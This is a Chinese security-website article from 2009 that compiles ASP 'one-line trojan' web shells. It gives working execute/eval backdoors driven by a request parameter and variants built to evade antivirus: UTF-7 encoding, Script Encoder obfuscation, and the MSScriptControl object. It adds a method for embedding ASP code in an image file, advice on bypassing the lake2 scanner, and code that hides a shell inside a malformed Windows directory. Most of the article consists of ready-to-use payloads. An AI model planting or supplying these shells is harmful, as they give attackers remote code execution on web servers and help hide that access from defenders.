首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>网络安全>文章内容
一句话木马的部分整理
来源:www.vfcocus.net 作者:vfocus 发布时间:2009-08-13  

<%execute request("#")%>

<%execute request(chr(35))%>

<script language=VBScript runat=server>if request(chr(35))<>"""" then
ExecuteGlobal request(chr(35))
</script>

<%ExecuteGlobal request(chr(35))%>

<%eval request("#")%>

以上都是正常的SHELL,下面几个是变形,或者是用来免杀的

数据库里插入
┼攠數畣整爠煥敵瑳∨∣┩愾

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

用include包含一个图片,图片最好是通过copy /b 1.jpg+1.asp+1.jpg 2.jpg生成出来的
要绕过lake2的话,用几个变量加常量的方法定义图片名再包含就可以了


<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

 

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

另外还一个另类的,利用windows的目录漏洞,建立..\目录里面放一句话,
Set fso=Server.CreateObject("Scripting.FileSystemObject")
path=server.mappath("/")
Set f = fso.CreateFolder(path&"\index..\")
Set a = fso.CreateTextFile(path&"\index..\1.asp", True)
a.WriteLine"<script language=VBScript runat=server>if request(""&pass&"")<>"""" then"
a.WriteLine"response.clear"
a.WriteLine"Execute request(chr(35))"
a.WriteLine"response.end"
a.WriteLine"end if"
a.WriteLine"</script>"

一句话的木马并不只是有这些.脚本语言中大多数和系统交互的函数都能够用来作为后门.安全性和可用性是不可逆的.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·一句话木马
·samcrypt.lib简介
·教你轻松查看QQ空间加密后的好友
·web sniffer 在线嗅探/online ht
·SPIKE与Peach Fuzzer相关知识
·asp,php,aspx一句话集合
·Cisco PIX525 配置备忘
·用Iptables+Fedora做ADSL 路由器
·检查 Web 应用安全的几款开源免
·Md5(base64)加密与解密实战
·NT下动态切换进程分析笔记
·风险评估中的渗透测试
  相关文章
·Web应用防火墙(WAF Web Applica
·Finding vulnerabilities in PHP
·发现最新式的DDOS攻击方式
·撰写一组SNORT规则防御SQL注入
·关于安全服务部门下半年规划
·利用Sniffer进行DOS攻击流量分析
·来自IT的警匪片 账号盗窃答案的
·信息安全管理体系在基金公司的实
·Md5(base64)加密与解密实战
·Default Logins and Passwords f
· 抵抗DDoS防火墙更新换代
·检查 Web 应用安全的几款开源免
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved